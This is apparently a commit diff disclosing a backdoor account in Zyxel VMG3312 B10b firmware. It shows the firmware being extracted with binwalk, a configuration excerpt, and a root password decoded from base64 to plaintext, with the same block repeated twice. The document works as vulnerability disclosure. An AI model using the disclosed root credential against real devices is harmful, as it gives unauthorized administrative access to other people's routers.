numanturle · September 17, 2025 14:52 · anildurgun · Sep 17, 2025 · numanturle · Sep 17, 2025
diff --git a/Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account b/Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
 root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin

 DECIMAL       HEXADECIMAL     DESCRIPTION
 --------------------------------------------------------------------------------
 131072        0x20000         JFFS2 filesystem, big endian

 JFFS2 filesystem extract

 total 1492
 1049502 drwxr-xr-x 18 root root    4096 Oct 27 23:33 .
 1049493 drwxr-xr-x  3 root root    4096 Oct 27 23:33 ..
 1049503 drwxr-xr-x  2 root root    4096 Oct 27 23:33 bin
 1049509 drwxr-xr-x  2 root root    4096 Oct 27 23:33 data
 1049510 drwxr-xr-x  5 root root    4096 Oct 27 23:33 dev
 1049512 drwxr-xr-x 14 root root    4096 Oct 27 23:33 etc
 1049513 drwxr-xr-x  2 root root    4096 Oct 27 23:33 firmware
 1049514 drwxr-xr-x  2 root root    4096 Oct 27 23:33 home
 1049515 drwxr-xr-x  6 root root    4096 Oct 27 23:33 lib
 1049516 lrwxrwxrwx  1 root root      11 Oct 27 23:33 linuxrc -> bin/busybox
 1049517 drwxr-xr-x  2 root root    4096 Oct 27 23:33 log
 1049518 drwxr-xr-x  2 root root    4096 Oct 27 23:33 mnt
 1049519 drwxr-xr-x  5 root root    4096 Oct 27 23:33 opt
 1049520 drwxr-xr-x  2 root root    4096 Oct 27 23:33 proc
 1049521 drwxr-xr-x  2 root root    4096 Oct 27 23:33 sbin
 1049522 drwxr-xr-x  2 root root    4096 Oct 27 23:33 sys
 1049523 lrwxrwxrwx  1 root root       8 Oct 27 23:33 tmp -> /var/tmp
 1049524 drwxr-xr-x  4 root root    4096 Oct 27 23:33 usr
 1049525 drwxr-xr-x  3 root root    4096 Oct 27 23:33 var
 1049526 -rw-r--r--  1 root root 1450819 Oct 27 23:33 vmlinux.lz
 1049527 drwxr-xr-x  4 root root    4096 Oct 27 23:33 webs


 open etc/default.cfg
        
        <User instance="2">
          <Enable>TRUE</Enable>
          <Level>2</Level>
          <Username>root</Username>
          <Password>dFRuMytaQCFTcjBPKwA=</Password>
        </User>
 base64 decode for password <Password> ; tTn3+Z@!Sr0O+
 root:tTn3+Z@!Sr0O+
	root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin

	DECIMAL HEXADECIMAL DESCRIPTION
	--------------------------------------------------------------------------------
	131072 0x20000 JFFS2 filesystem, big endian

	JFFS2 filesystem extract

	total 1492
	1049502 drwxr-xr-x 18 root root 4096 Oct 27 23:33 .
	1049493 drwxr-xr-x 3 root root 4096 Oct 27 23:33 ..
	1049503 drwxr-xr-x 2 root root 4096 Oct 27 23:33 bin
	1049509 drwxr-xr-x 2 root root 4096 Oct 27 23:33 data
	1049510 drwxr-xr-x 5 root root 4096 Oct 27 23:33 dev
	1049512 drwxr-xr-x 14 root root 4096 Oct 27 23:33 etc
	1049513 drwxr-xr-x 2 root root 4096 Oct 27 23:33 firmware
	1049514 drwxr-xr-x 2 root root 4096 Oct 27 23:33 home
	1049515 drwxr-xr-x 6 root root 4096 Oct 27 23:33 lib
	1049516 lrwxrwxrwx 1 root root 11 Oct 27 23:33 linuxrc -> bin/busybox
	1049517 drwxr-xr-x 2 root root 4096 Oct 27 23:33 log
	1049518 drwxr-xr-x 2 root root 4096 Oct 27 23:33 mnt
	1049519 drwxr-xr-x 5 root root 4096 Oct 27 23:33 opt
	1049520 drwxr-xr-x 2 root root 4096 Oct 27 23:33 proc
	1049521 drwxr-xr-x 2 root root 4096 Oct 27 23:33 sbin
	1049522 drwxr-xr-x 2 root root 4096 Oct 27 23:33 sys
	1049523 lrwxrwxrwx 1 root root 8 Oct 27 23:33 tmp -> /var/tmp
	1049524 drwxr-xr-x 4 root root 4096 Oct 27 23:33 usr
	1049525 drwxr-xr-x 3 root root 4096 Oct 27 23:33 var
	1049526 -rw-r--r-- 1 root root 1450819 Oct 27 23:33 vmlinux.lz
	1049527 drwxr-xr-x 4 root root 4096 Oct 27 23:33 webs


	open etc/default.cfg

	<User instance="2">
	<Enable>TRUE</Enable>
	<Level>2</Level>
	<Username>root</Username>
	<Password>dFRuMytaQCFTcjBPKwA=</Password>
	</User>
	base64 decode for password <Password> ; tTn3+Z@!Sr0O+
	root:tTn3+Z@!Sr0O+